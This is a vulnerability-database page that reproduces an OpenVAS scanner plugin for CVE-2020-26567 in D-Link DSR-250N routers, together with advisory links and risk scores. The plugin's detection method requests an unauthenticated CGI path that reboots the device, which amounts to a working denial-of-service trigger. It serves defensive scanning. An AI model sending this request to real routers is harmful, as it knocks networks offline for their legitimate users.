D-Link DSR-250N DoS Vulnerability (CVE-2020-26567) - Active Check
🗓️ 14 Dec 2020 00:00:00Reported by Copyright (C) 2020 Greenbone AGType
openvas🔗 plugins.openvas.org👁 24 Views
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2020-26567 | 8 Sep 202216:16 | – | circl | |
| D-Link DSR-250N Denial of Service Vulnerability | 9 Oct 202000:00 | – | cnvd | |
| D-Link Routers Authentication Bypass (CVE-2020-26567) | 18 Sep 202200:00 | – | checkpoint_advisories | |
| CVE-2020-26567 | 8 Oct 202012:22 | – | cve | |
| CVE-2020-26567 | 8 Oct 202012:22 | – | cvelist | |
| D-Link DSR-250N 3.12 - Denial of Service (PoC) | 8 Oct 202000:00 | – | exploitdb | |
| CVE-2020-26567 | 8 Oct 202013:15 | – | nvd | |
| CVE-2020-26567 | 8 Oct 202013:15 | – | osv | |
| D-Link DSR-250N Denial Of Service | 8 Oct 202000:00 | – | packetstorm | |
| Authentication flaw | 8 Oct 202013:15 | – | prion |
10
| Source | Link |
|---|---|
| packetstormsecurity | www.packetstormsecurity.com/files/159516/D-Link-DSR-250N-Denial-Of-Service.html |
| redteam-pentesting | www.redteam-pentesting.de/advisories/rt-sa-2020-002 |
| seclists | www.seclists.org/fulldisclosure/2020/Oct/14 |
| supportannouncement | www.supportannouncement.us.dlink.com/announcement/publication.aspx |
# SPDX-FileCopyrightText: 2020 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE_PREFIX = "cpe:/o:dlink";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.117076");
script_version("2025-10-15T05:39:06+0000");
script_tag(name:"last_modification", value:"2025-10-15 05:39:06 +0000 (Wed, 15 Oct 2025)");
script_tag(name:"creation_date", value:"2020-12-14 11:53:42 +0000 (Mon, 14 Dec 2020)");
script_tag(name:"cvss_base", value:"4.9");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:N/I:N/A:C");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2020-10-19 20:02:00 +0000 (Mon, 19 Oct 2020)");
script_cve_id("CVE-2020-26567");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"VendorFix");
script_name("D-Link DSR-250N DoS Vulnerability (CVE-2020-26567) - Active Check");
script_category(ACT_DENIAL);
script_copyright("Copyright (C) 2020 Greenbone AG");
script_family("Denial of Service");
script_dependencies("gb_dlink_dsr_http_detect.nasl");
script_require_ports("Services/www", 443);
script_mandatory_keys("d-link/dsr/http/detected");
script_tag(name:"summary", value:"D-Link DSR-250N devices are prone to a denial of service (DoS)
vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks if the device
isn't accessible anymore afterwards.");
script_tag(name:"insight", value:"CGI scripts exist on the router that can be directly accessed
with a web browser, without any authentication. In particular, the script
'/scgi-bin/upgradeStatusReboot.cgi' executes the command to reboot the device.");
script_tag(name:"impact", value:"By sending repeated requests an attacker is able to constantly
restarting the device making it unusable for legit users.");
script_tag(name:"affected", value:"D-Link DSR-250N devices with firmware version 3.12 and below
are known to be affected. Other versions or DSR models might be affected as well.");
script_tag(name:"solution", value:"Update to version 3.17B301C_WW or later. Please see the
referenced vendor advisory for more information.");
script_xref(name:"URL", value:"https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10192");
script_xref(name:"URL", value:"https://www.redteam-pentesting.de/advisories/rt-sa-2020-002");
script_xref(name:"URL", value:"http://packetstormsecurity.com/files/159516/D-Link-DSR-250N-Denial-Of-Service.html");
script_xref(name:"URL", value:"http://seclists.org/fulldisclosure/2020/Oct/14");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
if( ! infos = get_app_port_from_cpe_prefix( cpe:CPE_PREFIX, service:"www" ) )
exit( 0 );
port = infos["port"];
CPE = infos["cpe"];
if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
exit( 0 );
if( http_is_dead( port:port ) )
exit( 0 );
url = "/scgi-bin/upgradeStatusReboot.cgi";
req = http_get( port:port, item:url );
res = http_send_recv( port:port, data:req );
if( res && res =~ "^HTTP/1\.[01] 404" )
exit( 99 ); # nb: On some versions the file wasn't available which might be the fix for this issue done by the vendor.
sleep( 1 );
if( http_is_dead( port:port ) ) {
report = http_report_vuln_url( port:port, url:url ) + " (WARNING: Device will reboot if this URL is opened)";
security_message( port:port, data:report );
exit( 0 );
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Oct 2025 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 24.9
CVSS 3.15.5
EPSS0.17176